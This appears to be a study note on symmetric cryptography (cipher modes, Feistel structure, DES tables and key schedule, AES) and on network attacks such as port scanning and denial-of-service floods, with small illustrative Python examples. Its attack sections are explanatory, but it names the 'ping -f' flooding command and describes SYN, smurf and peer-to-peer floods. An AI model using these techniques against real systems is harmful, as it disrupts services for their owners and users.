Keys are the weakest link: Since the only secret part of the process, other than the plaintext, is the key, once the key is lost all messages encrypted with that key are accessible. A new set of keys must also be distributed.
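To make the growth rates concrete, here is a small sketch. It assumes one shared key per unordered pair of people in the symmetric case and one key pair per person in the asymmetric case; the function names are illustrative.

```python
def symmetric_keys(n: int) -> int:
    """Number of pairwise shared keys for n people: one per unordered pair."""
    return n * (n - 1) // 2


def asymmetric_key_pairs(n: int) -> int:
    """Assumed model: each person holds a single public/private key pair."""
    return n


for n in (2, 10, 100, 1000):
    print(n, symmetric_keys(n), asymmetric_key_pairs(n))
```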

Speed
Symmetric-key algorithms are generally much less computationally intensive than asymmetric-key algorithms. In practice, asymmetric-key algorithms are typically hundreds to thousands of times slower than symmetric-key algorithms.

Categories
The S-Box - Substitution Cipher
Each S-box takes in a 6-bit input and produces a 4-bit output. Provides confusion. Each S-box is a table of 4 rows by 16 columns in which each entry is a 4-bit number. Input bits 1 and 6 combine to form a 2-bit number, which selects the row in the S-box. Input bits 2, 3, 4 and 5 combine to form a 4-bit number, which selects the column in the S-box. The 4-bit number at that row and column is used as the 4-bit output.
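The row and column selection described above can be sketched as follows. The table used is the first DES S-box (S1), chosen here as a concrete example since the text does not say which table it has in mind; sbox_lookup is an illustrative name, and bit 1 is taken to be the most significant of the six input bits.

```python
# First DES S-box (S1): 4 rows by 16 columns of 4-bit values.
S1 = [
    [14, 4, 13, 1, 2, 15, 11, 8, 3, 10, 6, 12, 5, 9, 0, 7],
    [0, 15, 7, 4, 14, 2, 13, 1, 10, 6, 12, 11, 9, 5, 3, 8],
    [4, 1, 14, 8, 13, 6, 2, 11, 15, 12, 9, 7, 3, 10, 5, 0],
    [15, 12, 8, 2, 4, 9, 1, 7, 5, 11, 3, 14, 10, 0, 6, 13],
]


def sbox_lookup(table, six_bits: int) -> int:
    """Map a 6-bit input to a 4-bit output using the outer/inner bit split."""
    row = ((six_bits >> 4) & 0b10) | (six_bits & 0b01)  # bits 1 and 6
    col = (six_bits >> 1) & 0b1111                      # bits 2 to 5
    return table[row][col]


# Input 011011: row = 01 (1), column = 1101 (13).
print(format(sbox_lookup(S1, 0b011011), "04b"))
```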

The P-Box - Permutation Cipher


Reorders the 32-bit input from the S-boxes to produce a new 32-bit output. Provides diffusion.

Output bit   Input bit     Output bit   Input bit
1            16            17           2
2            7             18           8
3            20            19           24
4            21            20           14
5            29            21           32
6            12            22           27
7            28            23           3
8            17            24           9
9            1             25           19
10           15            26           13
11           23            27           30
12           26            28           6
13           5             29           22
14           18            30           11
15           31            31           4
16           10            32           25

32-bit output based on 32-bit input
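Applying the permutation table above is a direct lookup: output bit i takes the value of the input bit listed for it. A minimal sketch, representing the block as a list of 32 bits with bit 1 first (the function names are illustrative):

```python
# P[i - 1] is the input bit that feeds output bit i (1-based, as in the table).
P = [16, 7, 20, 21, 29, 12, 28, 17, 1, 15, 23, 26, 5, 18, 31, 10,
     2, 8, 24, 14, 32, 27, 3, 9, 19, 13, 30, 6, 22, 11, 4, 25]


def permute(bits, table):
    """Reorder bits so that output position i holds input bit table[i - 1]."""
    return [bits[src - 1] for src in table]


def invert(table):
    """Build the table that undoes `table`."""
    inverse = [0] * len(table)
    for out_pos, in_pos in enumerate(table, start=1):
        inverse[in_pos - 1] = out_pos
    return inverse


block = [0] * 32
block[15] = 1                      # set input bit 16 only
shuffled = permute(block, P)
print(shuffled.index(1) + 1)       # position the set bit moved to
print(permute(shuffled, invert(P)) == block)
```

Because the table is a pure reordering, it is trivially invertible and adds no confusion on its own; its job is to spread each S-box's output across several S-boxes in the next round.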

Symmetric-key algorithms can be divided into stream ciphers and block ciphers. Stream ciphers operate on a single bit (byte or computer word) at a time. They may implement some form of feedback mechanism so that the key is constantly changing. Block ciphers take a number of bits (chunk) and encrypt them as a single unit. In general, the same plaintext block will always encrypt to the same ciphertext when using the same key in a block cipher whereas the same plaintext will encrypt to different ciphertext in a stream cipher.

Stream Ciphers
A stream cipher is a symmetric-key cipher where plaintext bits are combined with a pseudorandom cipher bit stream (keystream), typically by an exclusive-or (XOR) operation. In a stream cipher the plaintext digits are encrypted one at a time, and the transformation of successive digits varies during the encryption. An alternative name is a state cipher, as the encryption of each digit is dependent on the current state. There are several types of stream ciphers, but here are a couple of the main ones:

Self-synchronizing: a self-synchronizing cipher uses several of the previous N ciphertext digits to compute the keystream. Such schemes are known as self-synchronizing stream ciphers, asynchronous stream ciphers or ciphertext autokey (CTAK). It is termed "self-synchronizing" because the decryption process can stay synchronized with the encryption process merely by knowing how far into the n-bit keystream it is. The advantage is that the receiver will automatically synchronise with the keystream generator after receiving N ciphertext digits, making it easier to recover if digits are dropped or added to the message stream. Single-digit errors are limited in their effect, affecting only up to N plaintext digits.

Synchronous: in a synchronous stream cipher a stream of pseudo-random digits is generated independently of the plaintext and ciphertext messages, and then combined with the plaintext (to encrypt) or the ciphertext (to decrypt). In the most common form, binary digits are used (bits), and the keystream is combined with the plaintext using XOR. This is termed a binary additive stream cipher. In a synchronous stream cipher, the sender and receiver must be exactly in step for decryption to be successful. If digits are added or removed from the message during transmission, synchronisation is lost. To restore synchronisation, various offsets can be tried systematically to obtain the correct decryption. Another approach is to tag the ciphertext with markers at regular points in the output.

Block Ciphers
A block cipher operates on blocks of fixed length, often 64 or 128 bits. Because messages may be of any length, and because encrypting the same plaintext under the same key always produces the same output (as described in the ECB section below), several modes of operation have been invented which allow block ciphers to provide confidentiality for messages of arbitrary length. 1. Split input into fixed sized blocks. 2. Apply encryption function to each block.

The earliest modes described in the literature (e.g. ECB, CBC, OFB and CFB) provide only confidentiality or message integrity, but do not provide both simultaneously. Other modes have since been designed which ensure both confidentiality and message integrity in one pass, such as IAPM, CCM, EAX, GCM and OCB modes. Block ciphers can operate in one of several modes; the following five are the most important.

Electronic Codebook (ECB) mode is the simplest, most obvious application: the secret key is used to encrypt the plaintext block to form a ciphertext block. Each plaintext block is encrypted using the same function and key, so two identical plaintext blocks will always generate the same ciphertext block. Although this is the most common mode of block ciphers, it is susceptible to a variety of brute-force attacks.

One of the problems with ECB is that, because the same plaintext block always produces the same ciphertext block, it does not hide data patterns well. In some senses, it doesn't provide serious message confidentiality, and it is not recommended for use in cryptographic protocols at all. A demonstration of this:

[Figure: three panels showing the same image: Original; Encrypted using ECB mode; Encrypted using other modes]

Cipher Block Chaining (CBC) mode adds a feedback mechanism to the encryption scheme. In CBC, each plaintext block is exclusive-ORed (XORed) with the previous ciphertext block and then encrypted with the key. As a result, two identical blocks of plaintext will in practice not encrypt to the same ciphertext. An initialisation vector (IV) is required in place of the previous ciphertext block for the very first plaintext block.
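The difference between ECB and CBC can be seen with a deliberately simple stand-in block cipher. Everything below is a sketch under stated assumptions: toy_encrypt_block and toy_decrypt_block are hypothetical helpers built from SHA-256 purely for illustration (they are not DES or AES and offer no real security), the key and message are made up, and the message length is assumed to be an exact multiple of the block size so no padding is needed.

```python
import hashlib
import os

BLOCK = 16  # toy block size in bytes


def _xor(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))


def _f(key: bytes, rnd: int, half: bytes) -> bytes:
    # Toy round function: keyed hash truncated to half a block.
    return hashlib.sha256(key + bytes([rnd]) + half).digest()[:len(half)]


def toy_encrypt_block(key: bytes, block: bytes) -> bytes:
    left, right = block[:BLOCK // 2], block[BLOCK // 2:]
    for rnd in range(4):
        left, right = right, _xor(left, _f(key, rnd, right))
    return left + right


def toy_decrypt_block(key: bytes, block: bytes) -> bytes:
    left, right = block[:BLOCK // 2], block[BLOCK // 2:]
    for rnd in reversed(range(4)):
        left, right = _xor(right, _f(key, rnd, left)), left
    return left + right


def ecb_encrypt(key: bytes, plaintext: bytes) -> bytes:
    # Every block is encrypted independently with the same key.
    return b"".join(toy_encrypt_block(key, plaintext[i:i + BLOCK])
                    for i in range(0, len(plaintext), BLOCK))


def cbc_encrypt(key: bytes, iv: bytes, plaintext: bytes) -> bytes:
    prev, out = iv, []
    for i in range(0, len(plaintext), BLOCK):
        # XOR with the previous ciphertext block (or the IV), then encrypt.
        prev = toy_encrypt_block(key, _xor(plaintext[i:i + BLOCK], prev))
        out.append(prev)
    return b"".join(out)


def cbc_decrypt(key: bytes, iv: bytes, ciphertext: bytes) -> bytes:
    prev, out = iv, []
    for i in range(0, len(ciphertext), BLOCK):
        block = ciphertext[i:i + BLOCK]
        out.append(_xor(toy_decrypt_block(key, block), prev))
        prev = block
    return b"".join(out)


key = b"demo key"
iv = os.urandom(BLOCK)             # fresh random IV for each message
message = b"A" * BLOCK * 2         # two identical plaintext blocks

ecb = ecb_encrypt(key, message)
cbc = cbc_encrypt(key, iv, message)
print("ECB blocks equal:", ecb[:BLOCK] == ecb[BLOCK:])
print("CBC blocks equal:", cbc[:BLOCK] == cbc[BLOCK:])
```

In ECB the repeated plaintext block is visible as a repeated ciphertext block; in CBC the chaining hides it, provided the IV is not reused with the same key.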

Cipher Feedback (CFB) mode is a block cipher implementation as a self-synchronizing stream cipher. CFB mode allows data to be encrypted in units smaller than the block size, which might be useful in some applications such as encrypting interactive terminal input. If we were using 1-byte CFB mode, for example, each incoming character is placed into a shift register the same size as the block, encrypted, and the block transmitted. At the receiving side, the ciphertext is decrypted and the extra bits in the block (i.e., everything above and beyond the one byte) are discarded.
[Figures: cfb_encryption.jpg, cfb_decryption.jpg]

Output Feedback (OFB) mode is a block cipher implementation conceptually similar to a synchronous stream cipher. OFB prevents the same plaintext block from generating the same ciphertext block by using an internal feedback mechanism that is independent of both the plaintext and ciphertext bitstreams.
[Figures: ofb_encryption.jpg, ofb_decryption.jpg]

Counter (CTR) mode uses a counter with the key to generate a cipher stream. The cipher stream is XORed with the input plaintext block to produce the ciphertext. The counter adds randomness, so the same input plaintext block will not produce the same ciphertext block, which prevents frequency analysis attacks.
[Figure: Lab/TheoryReviewNote/CTR.jpg]

Initialization Vector (IV)
All these modes (except ECB) require an initialization vector, or IV: a sort of 'dummy block' to kick off the process for the first real block, and also to provide some randomization for the process. There is no need for the IV to be secret, in most cases, but it is important that it is never reused with the same key. For CBC and CFB, reusing an IV leaks some information about the first block of plaintext, and about any common prefix shared by the two messages. For OFB and CTR, reusing an IV completely destroys security. In CBC mode, the IV must, in addition, be randomly generated at encryption time.

Feistel Cipher

Feistel Cipher: a Feistel cipher is a symmetric structure used in the construction of block ciphers. A large proportion of block ciphers use the scheme, including the Data Encryption Standard (DES). The Feistel structure has the advantage that encryption and decryption operations are very similar, even identical in some cases, requiring only a reversal of the key schedule. Therefore the size of the code or circuitry required to implement such a cipher is nearly halved. It is also commonly known as a Feistel network.

Feistel ciphers and similar constructions are product ciphers, and so combine multiple rounds of repeated operations, such as:
Bit-shuffling (often called permutation boxes or P-boxes)
Simple non-linear functions (often called substitution boxes or S-boxes)
Linear mixing (in the sense of modular algebra) using XOR
to produce a function with large amounts of what Claude Shannon described as "confusion and diffusion". Bit shuffling creates the diffusion effect, while substitution is used for confusion.
[Figure: Lab/TheoryReviewNote/Feistel.jpg]

1. Input is split into two equal sized blocks L and R.
2. Ki = key for round i.
3. For each round i, L(i+1) = R(i) and R(i+1) = L(i) XOR F(Ki, R(i)).
4. The function F does not have to be invertible.

Padding
Block cipher algorithms like DES and Blowfish in Electronic Code Book (ECB) and Cipher Block Chaining (CBC) mode require their input to be an exact multiple of the block size. If the plaintext to be encrypted is not an exact multiple, you need to pad before encrypting by adding a padding string. When decrypting, the receiving party needs to know how to remove the padding in an unambiguous manner.

DES
DES is a block cipher, based on a symmetric-key algorithm, that takes a fixed-length string of plaintext bits and transforms it through a series of complicated operations into another ciphertext bitstring of the same length. DES also uses a key to customize the transformation, so that decryption can supposedly only be performed by those who know the particular key used to encrypt. The key ostensibly consists of 64 bits; however, only 56 of these are actually used by the algorithm. Eight bits are used solely for checking parity, and are thereafter discarded. Hence the effective key length is 56 bits, and it is usually quoted as such. Like other block ciphers, DES by itself is not a secure means of encryption but must instead be used in a mode of operation.
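The Feistel round rule described earlier in this section (the new left half is the old right half; the new right half is the old left half XORed with F of the round key and the old right half) can be sketched as below. This is a toy under stated assumptions: round_function is a made-up, non-invertible F based on SHA-256, the four subkeys are arbitrary constants, and the block is 64 bits split into two 32-bit halves. It is not DES.

```python
import hashlib


def round_function(subkey: int, half: int) -> int:
    """Toy F: hash the subkey with the half-block, keep 32 bits. Not invertible."""
    data = subkey.to_bytes(8, "big") + half.to_bytes(4, "big")
    return int.from_bytes(hashlib.sha256(data).digest()[:4], "big")


def feistel(block: int, subkeys) -> int:
    """Run a 64-bit block through the rounds, using subkeys in the given order."""
    left, right = block >> 32, block & 0xFFFFFFFF
    for k in subkeys:
        left, right = right, left ^ round_function(k, right)
    # The halves are not swapped after the final round, so output is (R, L).
    return (right << 32) | left


subkeys = [0x0F1E2D3C, 0x4B5A6978, 0x8796A5B4, 0xC3D2E1F0]  # hypothetical
plaintext = 0x0123456789ABCDEF

ciphertext = feistel(plaintext, subkeys)
# Decryption is the same routine with the subkeys applied in reverse order.
recovered = feistel(ciphertext, list(reversed(subkeys)))
print(hex(ciphertext), recovered == plaintext)
```

Note that decryption never needs to invert F; it only recomputes F on a half-block it already has, which is why F can be any function.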

DES has a block size of 64 bits and uses a Feistel cipher with 16 rounds. DES is now considered to be insecure for many applications. This is chiefly due to the 56-bit key size being too small; in January 1999, distributed.net and the Electronic Frontier Foundation collaborated to publicly break a DES key in 22 hours and 15 minutes. The algorithm is believed to be practically secure in the form of Triple DES, although there are theoretical attacks. The cipher has been superseded by the Advanced Encryption Standard (AES).

DES was also too slow. Triple-DES (encrypting with 3 different keys, or encrypt, decrypt, encrypt) made it more secure, but not secure enough.
Problem with DES: vulnerable to differential analysis.
The algorithm was initially controversial, with classified design elements, a relatively short key length, and suspicions about a National Security Agency (NSA) backdoor.
[Figure: Lab/TheoryReviewNote/DES.jpg]

Structure
There are 16 identical stages of processing, termed rounds. There is also an initial and final permutation, termed IP and FP, which are inverses (IP "undoes" the action of FP, and vice versa). IP and FP have almost no cryptographic significance, but were apparently included in order to facilitate loading blocks in and out of mid-1970s hardware, as well as to make DES run slower in software.

Before the main rounds, the block is divided into two 32-bit halves and processed alternately; this criss-crossing is known as the Feistel scheme. The Feistel structure ensures that decryption and encryption are very similar processes; the only difference is that the subkeys are applied in the reverse order when decrypting. The rest of the algorithm is identical. This greatly simplifies implementation, particularly in hardware, as there is no need for separate encryption and decryption algorithms.

In the figure, the red ⊕ symbol denotes the exclusive-OR (XOR) operation. The F-function scrambles half a block together with some of the key. The output from the F-function is then combined with the other half of the block, and the halves are swapped before the next round. After the final round, the halves are not swapped; this is a feature of the Feistel structure which makes encryption and decryption similar processes.

AES
AES is a block cipher and the replacement standard for DES, adopted in 2002. It uses blocks of size 128 bits, and the key can be 128, 192 or 256 bits. Some implementations of AES are susceptible to side-channel (timing) attacks, due to information leakage. It is sometimes referred to as Rijndael, though Rijndael allows for different block and key sizes. Unlike DES (the predecessor of AES), AES is a substitution-permutation network, not a Feistel network. In comparison to DES, AES is fast in both software and hardware, is relatively easy to implement, and requires little memory. Presently AES is considered to be secure with a sufficiently long key.

Strictly speaking, AES is not precisely Rijndael (although in practice the names are used interchangeably), as Rijndael supports a larger range of block and key sizes; AES has a fixed block size of 128 bits and a key size of 128, 192, or 256 bits, whereas Rijndael can be specified with key and block sizes in any multiple of 32 bits, with a minimum of 128 bits and a maximum of 256 bits. Since 1 byte equals 8 bits, the fixed block size of 128 bits is 128 / 8 = 16 bytes. AES operates on a 4×4 array of bytes, termed the state (versions of Rijndael with a larger block size have additional columns in the state). Most AES calculations are done in a special finite field. The cipher is specified in terms of repetitions of processing steps that are applied to make up rounds of keyed transformations between the input plaintext and the final output of ciphertext. A set of reverse rounds is applied to transform ciphertext back into the original plaintext using the same encryption key.

Attack Methods
Brute Force
For any cipher, the most basic method of attack is brute force: trying every possible key in turn. The length of the key determines the number of possible keys, and hence the feasibility of this approach.
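How key length drives feasibility can be estimated with simple arithmetic. The sketch below assumes a hypothetical attacker testing 10^12 keys per second; that rate is an illustrative assumption, not a measured figure, and the function names are made up for this example.

```python
SECONDS_PER_YEAR = 365.25 * 24 * 3600
ASSUMED_RATE = 10 ** 12  # keys tested per second (hypothetical attacker)


def keyspace(bits: int) -> int:
    """Number of possible keys for a key of the given length."""
    return 2 ** bits


def worst_case_seconds(bits: int, keys_per_second: int) -> float:
    """Time to try every key; on average the key is found in half this time."""
    return keyspace(bits) / keys_per_second


for name, bits in (("DES", 56), ("AES-128", 128), ("AES-256", 256)):
    years = worst_case_seconds(bits, ASSUMED_RATE) / SECONDS_PER_YEAR
    print(f"{name}: 2^{bits} keys, about {years:.3g} years in the worst case")
```

Each extra key bit doubles the work, which is why a 56-bit key falls within reach of dedicated hardware while 128-bit keys do not.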

Differential Cryptanalysis
Differential analysis: analysis that observes how a modification at the upper level (before encryption) changes the result at the lower level (after encryption).

Differential cryptanalysis is a general form of cryptanalysis applicable primarily to block ciphers, but also to stream ciphers and cryptographic hash functions. In the broadest sense, it is the study of how differences in an input can affect the resultant difference at the output. In the case of a block cipher, it refers to a set of techniques for tracing differences through the network of transformations, discovering where the cipher exhibits non-random behaviour, and exploiting such properties to recover the secret key.

Differential cryptanalysis is usually a chosen-plaintext attack, meaning that the attacker must be able to obtain encrypted ciphertexts for some set of plaintexts of his choosing. The scheme can successfully cryptanalyze DES with an effort on the order of 2^47 chosen plaintexts. There are, however, extensions that would allow a known-plaintext or even a ciphertext-only attack. The basic method uses pairs of plaintexts related by a constant difference; difference can be defined in several ways, but the exclusive-OR (XOR) operation is usual. The attacker then computes the differences of the corresponding ciphertexts, hoping to detect statistical patterns in their distribution. The resulting pair of differences is called a differential.

Symmetric ciphers have historically been susceptible to known-plaintext attacks, chosen-plaintext attacks, differential cryptanalysis and linear cryptanalysis. Careful construction of the functions for each round can greatly reduce the chances of a successful attack.
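The "statistical patterns" in question can be illustrated on a single small S-box by counting, for every input XOR difference, how often each output XOR difference occurs. This is a minimal sketch on a 4-bit toy S-box (its values are the first row of the DES S1 table, used here only as a convenient example); analysing a full cipher involves chaining such differences across rounds, which is not shown.

```python
# Toy 4-bit S-box (values taken from the first row of DES S1).
SBOX = [0xE, 0x4, 0xD, 0x1, 0x2, 0xF, 0xB, 0x8,
        0x3, 0xA, 0x6, 0xC, 0x5, 0x9, 0x0, 0x7]


def difference_table(sbox):
    """table[dx][dy] = number of inputs x with sbox[x] ^ sbox[x ^ dx] == dy."""
    size = len(sbox)
    table = [[0] * size for _ in range(size)]
    for dx in range(size):
        for x in range(size):
            dy = sbox[x] ^ sbox[x ^ dx]
            table[dx][dy] += 1
    return table


table = difference_table(SBOX)

# Find the most likely output difference for each non-zero input difference.
best = max(((table[dx][dy], dx, dy)
            for dx in range(1, 16) for dy in range(16)))
count, dx, dy = best
print(f"input difference {dx:#x} -> output difference {dy:#x} "
      f"for {count} of 16 inputs")
```

A perfectly "random-looking" S-box would spread each row evenly; entries well above the average are the non-random behaviour an attacker looks for.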

The F Function
[Figure: Lab/TheoryReviewNote/F_function.jpg]

The Feistel function (F-function), depicted above, operates on half a block (32 bits) at a time and consists of four stages:
1. Expansion: the 32-bit half-block is expanded to 48 bits using the expansion permutation, denoted E in the diagram, by duplicating some of the bits.
2. Key mixing: the result is combined with a subkey using an XOR operation. Sixteen 48-bit subkeys, one for each round, are derived from the main key using the key schedule (described below).
3. Substitution: after mixing in the subkey, the block is divided into eight 6-bit pieces before processing by the S-boxes, or substitution boxes. Each of the eight S-boxes replaces its six input bits with four output bits according to a non-linear transformation, provided in the form of a lookup table. The S-boxes provide the core of the security of DES; without them, the cipher would be linear, and trivially breakable.
4. Permutation: finally, the 32 outputs from the S-boxes are rearranged according to a fixed permutation, the P-box.

E (Expansion function)
Expands the 32-bit input into a 48-bit output by duplicating some bits.

Output bit   Input bit     Output bit   Input bit
1            32            25           16
2            1             26           17
3            2             27           18
4            3             28           19
5            4             29           20
6            5             30           21
7            4             31           20
8            5             32           21
9            6             33           22
10           7             34           23
11           8             35           24
12           9             36           25
13           8             37           24
14           9             38           25
15           10            39           26
16           11            40           27
17           12            41           28
18           13            42           29
19           12            43           28
20           13            44           29
21           14            45           30
22           15            46           31
23           16            47           32
24           17            48           1

48-bit output generated from the 32-bit input

The subkey
The 56-bit key is divided into two 28-bit halves. On every round, each 28-bit half is circularly left shifted by 1 or 2 bits (depending on the round). 24 bits from each half are used to form the 48-bit subkey.

Round    1  2  3  4  5  6  7  8  9  10  11  12  13  14  15  16
Shift    1  1  2  2  2  2  2  2  1  2   2   2   2   2   2   1

Number of key bit shifts per round

Key bit   Input bit     Key bit   Input bit
1         14            25        41
2         17            26        52
3         11            27        31
4         24            28        37
5         1             29        47
6         5             30        55
7         3             31        30
8         28            32        40
9         15            33        51
10        6             34        45
11        21            35        33
12        10            36        48
13        23            37        44
14        19            38        49
15        12            39        39
16        4             40        56
17        26            41        34
18        8             42        53
19        16            43        46
20        7             44        42
21        27            45        50
22        20            46        36
23        13            47        29
24        2             48        32

The 48-bit subkey composed of bits from the 56-bit key
[Figure: DES-key-schedule.png]
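The rotate-then-select procedure for producing the sixteen subkeys can be sketched as follows. The sketch starts from a 56-bit key that has already had its parity bits removed (the initial selection of 56 bits from the 64-bit key is not shown), represents bits as a list with bit 1 first, and uses the standard DES shift schedule and selection table; the function names and the sample key are illustrative.

```python
# Left-shift amount for each of the 16 rounds.
SHIFTS = [1, 1, 2, 2, 2, 2, 2, 2, 1, 2, 2, 2, 2, 2, 2, 1]

# Selection table: subkey bit i is taken from bit PC2[i - 1] of the 56-bit state.
PC2 = [14, 17, 11, 24, 1, 5, 3, 28, 15, 6, 21, 10,
       23, 19, 12, 4, 26, 8, 16, 7, 27, 20, 13, 2,
       41, 52, 31, 37, 47, 55, 30, 40, 51, 45, 33, 48,
       44, 49, 39, 56, 34, 53, 46, 42, 50, 36, 29, 32]


def rotate_left(bits, n):
    """Circular left shift of a list of bits."""
    return bits[n:] + bits[:n]


def make_subkeys(key56):
    """Return the sixteen 48-bit subkeys for a 56-bit key (list of 0/1)."""
    c, d = key56[:28], key56[28:]
    subkeys = []
    for shift in SHIFTS:
        c, d = rotate_left(c, shift), rotate_left(d, shift)
        state = c + d
        subkeys.append([state[i - 1] for i in PC2])
    return subkeys, c, d


key56 = [(i * 7 + 3) % 2 if i % 5 else 1 for i in range(56)]  # arbitrary demo key
subkeys, c_final, d_final = make_subkeys(key56)
print(len(subkeys), len(subkeys[0]))
# The shifts total 28, so both halves end up back where they started.
print(c_final == key56[:28] and d_final == key56[28:])
```

Because the shifts sum to 28, the halves return to their starting position after round 16, which makes it straightforward to generate the subkeys in reverse order for decryption.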

Side Channel Attacks


Side channel attacks do not attack the underlying cipher and so have nothing to do with its security as described here, but attack implementations of the cipher on systems which inadvertently leak data. There are several such known attacks on certain implementations of AES. Examples of side channel attacks:
Timing attack - figuring out an attack by using knowledge of instruction times. By observing how long it takes to encrypt various plaintexts with the same key, we can get hints about the key.
Power attack - figuring out an attack by using knowledge of instruction power consumption. With a smartcard, for example, the reader can measure how much power the card is drawing, and hence figure out what operations are going on.
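The idea behind a timing leak can be shown in a setting simpler than timing a cipher: comparing a secret value against a guess. The sketch below is an illustration under assumptions, not a description of any particular attack on AES; leaky_equal and steps_before_exit are made-up helpers, and the loop-iteration count stands in for elapsed time so the result is deterministic. hmac.compare_digest is the standard-library comparison designed to avoid this kind of leak.

```python
import hmac


def leaky_equal(secret: bytes, guess: bytes) -> bool:
    """Byte-by-byte comparison that stops at the first mismatch."""
    if len(secret) != len(guess):
        return False
    for s, g in zip(secret, guess):
        if s != g:
            return False  # early exit: run time depends on matching prefix
    return True


def steps_before_exit(secret: bytes, guess: bytes) -> int:
    """Loop iterations leaky_equal would perform; a stand-in for run time."""
    steps = 0
    for s, g in zip(secret, guess):
        steps += 1
        if s != g:
            break
    return steps


def constant_time_equal(secret: bytes, guess: bytes) -> bool:
    """Comparison whose duration does not depend on where the bytes differ."""
    return hmac.compare_digest(secret, guess)


secret = b"k3y!"  # hypothetical secret
for guess in (b"aaaa", b"kaaa", b"k3aa", b"k3y!"):
    print(guess, steps_before_exit(secret, guess),
          leaky_equal(secret, guess), constant_time_equal(secret, guess))
```

An attacker who can measure the work done learns how many leading bytes of a guess are correct, and can recover the secret one byte at a time instead of guessing it all at once.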

Replay attack
Replay attack: Once you have seen that a particular ciphertext corresponds to a particular plaintext then you can replay that message.

Network Scans and Attacks


Sniffing is the term generally used for traffic monitoring within a network, while port scanning is used to find out information about a remote network.

Types of Network Attack
Some types of network attack:
1. Password cracking: using software to guess passwords to accounts.
2. Address spoofing: sending spoofed network commands into a network with a trusted IP address.
3. Impersonation: by tricking routers and the domain name registry, attackers can redirect traffic to their site.
4. Eavesdropping (Sniffing): intercepting data in transit.
5. Exploits: exploiting software that has bugs.
6. Back doors: some software developers put in back doors intended for their use only, but these may be exploited.
7. Open doors: accidentally leaving the network open, which may be used by attackers.
8. Viruses and trojan horses
9. Social engineering
10. Denial of service

Port Scanning

Prior to sniffing a network an attacker has to gain access. Attackers gain access by scanning devices on the network for vulnerabilities, then exploiting them. Port scanning can either be targeted or random. An attacker interested in a particular network will attempt to track down information about that network and scan for vulnerabilities. Alternatively, attackers will put large netblocks into a port scanner and let it run for days, trying to find any machine that is available and able to be exploited.

A tool commonly used for port scanning is nmap (www.insecure.org/nmap/). It allows users to enter a range of IP addresses, choose the type of scan desired, and let the program run in the background. Nmap can be configured to scan all TCP and User Datagram Protocol (UDP) ports, or just the ports that generally have services running on them. Using the information collected in the example, notice there were 12 out of 1,589 scanned ports responding on the server. Once the list of ports and host names has been compiled, the next step is to try to exploit weaknesses in the various server configurations. This involves knowing what the weaknesses of the different servers are and exploiting those weaknesses.

Denial of Service
A denial-of-service attack (DoS attack) or distributed denial-of-service attack (DDoS attack) is an attempt to make a computer resource unavailable to its intended users. One common method of attack involves saturating the target (victim) machine with external communications requests, such that it cannot respond to legitimate traffic, or responds so slowly as to be rendered effectively unavailable. In general terms, DoS attacks are implemented by either forcing the targeted computer(s) to reset, consuming their resources so that they can no longer provide their intended service, or obstructing the communication media between the intended users and the victim so that they can no longer communicate adequately.

A "denial-of-service" attack is characterized by an explicit attempt by attackers to prevent legitimate users of a service from using that service. Attacks can be directed at any network device, including attacks on routing devices and web, electronic mail, or Domain Name System servers. A DoS attack can be perpetrated in a number of ways. The five basic types of attack are:
1. Consumption of computational resources, such as bandwidth, disk space, or processor time.
2. Disruption of configuration information, such as routing information.
3. Disruption of state information, such as unsolicited resetting of TCP sessions.
4. Disruption of physical network components.
5. Obstructing the communication media between the intended users and the victim so that they can no longer communicate adequately.

ICMP flood
A smurf attack is one particular variant of a flooding DoS attack on the public Internet. It relies on misconfigured network devices that allow packets to be sent to all computer hosts on a particular network via the broadcast address of the network, rather than a specific machine. The network then serves as a smurf amplifier. In such an attack, the perpetrators will send large numbers of IP packets with the source address faked to appear to be the address of the victim. The network's bandwidth is quickly used up, preventing legitimate packets from getting through to their destination. To combat Denial of Service attacks on the Internet, services like the Smurf Amplifier Registry have given network service providers the ability to identify misconfigured networks and to take appropriate action such as filtering.

Ping flood is based on sending the victim an overwhelming number of ping packets, usually using the "ping -f" command from Unix-like hosts. It is very simple to launch; the primary requirement is being able to access greater bandwidth than the victim.

SYN flood sends a flood of TCP/SYN packets, often with a forged sender address. Each of these packets is handled like a connection request, causing the server to spawn a half-open connection by sending back a TCP/SYN-ACK packet and waiting for a packet in response from the sender address. However, because the sender address is forged, the response never comes. These half-open connections saturate the number of available connections the server is able to make, keeping it from responding to legitimate requests until after the attack ends.

Teardrop attack
A Teardrop attack involves sending mangled IP fragments with overlapping, over-sized payloads to the target machine. A bug in the TCP/IP fragmentation re-assembly code of various operating systems causes the fragments to be improperly handled, crashing the system as a result. Windows 3.1x, Windows 95 and Windows NT operating systems, as well as versions of Linux prior to versions 2.0.32 and 2.1.63, are vulnerable to this attack.

Peer-to-peer attacks
Attackers have found a way to exploit a number of bugs in peer-to-peer servers to initiate DDoS attacks.
The most aggressive of these peer-to-peer DDoS attacks exploits DC++. Peer-to-peer attacks are different from regular botnet-based attacks. With peer-to-peer there is no botnet and the attacker does not have to communicate with the clients it subverts. Instead, the attacker acts as a 'puppet master', instructing clients of large peer-to-peer file sharing hubs to disconnect from their peer-to-peer network and to connect to the victim's website instead. As a result, several thousand computers may aggressively try to connect to a target website. While a typical web server can handle a few hundred connections/sec before performance begins to degrade, most web servers fail almost instantly under five or six thousand connections/sec. With a moderately big peer-to-peer attack a site could potentially be hit with up to 750,000 connections in short order. The targeted web server will be plugged up and confused by the incoming connections.

While peer-to-peer attacks are easy to identify with signatures, the large number of IP addresses that need to be blocked (often over 250,000 during the course of a big attack) means that this type of attack can overwhelm mitigation defenses. Even if a mitigation device can keep blocking IP addresses, there are other problems to consider. For instance, there is a brief moment where the connection is opened on the server side before the signature itself comes through. Only once the connection is opened to the server can the identifying signature be sent and detected, and the connection torn down. Even tearing down connections takes server resources and can harm the server.

Permanent denial-of-service attacks
A permanent denial-of-service (PDoS), also known loosely as phlashing, is an attack that damages a system so badly that it requires replacement or reinstallation of hardware. Unlike the distributed denial-of-service attack, a PDoS attack exploits security flaws in the remote management interfaces of the victim's hardware, be it routers, printers, or other networking hardware. These flaws leave the door open for an attacker to remotely 'update' the device firmware to a modified, corrupt or defective firmware image, thereby bricking the device and making it permanently unusable for its original purpose. The PDoS is a pure hardware-targeted attack which can be much faster and requires fewer resources than using a botnet in a DDoS attack.

Application level floods
On IRC, IRC floods are a common electronic warfare weapon. Various DoS-causing exploits such as buffer overflow can cause server-running software to get confused and fill the disk space or consume all available memory or CPU time.

